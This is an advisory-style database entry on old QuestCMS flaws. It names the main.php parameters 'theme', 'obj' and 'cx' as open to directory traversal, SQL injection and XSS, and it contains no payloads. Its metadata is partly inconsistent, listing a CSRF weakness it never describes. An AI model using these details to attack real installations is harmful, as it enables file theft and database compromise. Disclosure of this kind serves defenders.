vendor:
QuestCMS
by:
d3b4g
7.5
CVSS
HIGH
XSS/Directory Traversal/SQL Injection
79, 89, 352
CWE
Product Name: QuestCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]
A vulnerability exists in Questwork Web Content Management system (QuestCMS) which allows an attacker to perform Directory Traversal, SQL Injection and XSS attacks. The Directory Traversal vulnerability exists in the 'theme' parameter of the 'main.php' script, which allows an attacker to read arbitrary files on the server. The SQL Injection vulnerability exists in the 'obj' parameter of the 'main.php' script, which allows an attacker to execute arbitrary SQL queries. The XSS vulnerability exists in the 'cx' parameter of the 'main.php' script, which allows an attacker to inject arbitrary web script or HTML.
Mitigation:
Input validation should be performed to ensure that user-supplied data is properly sanitized. Additionally, the application should be configured to use the least-privileged user account with the least amount of privileges necessary to perform its functions.
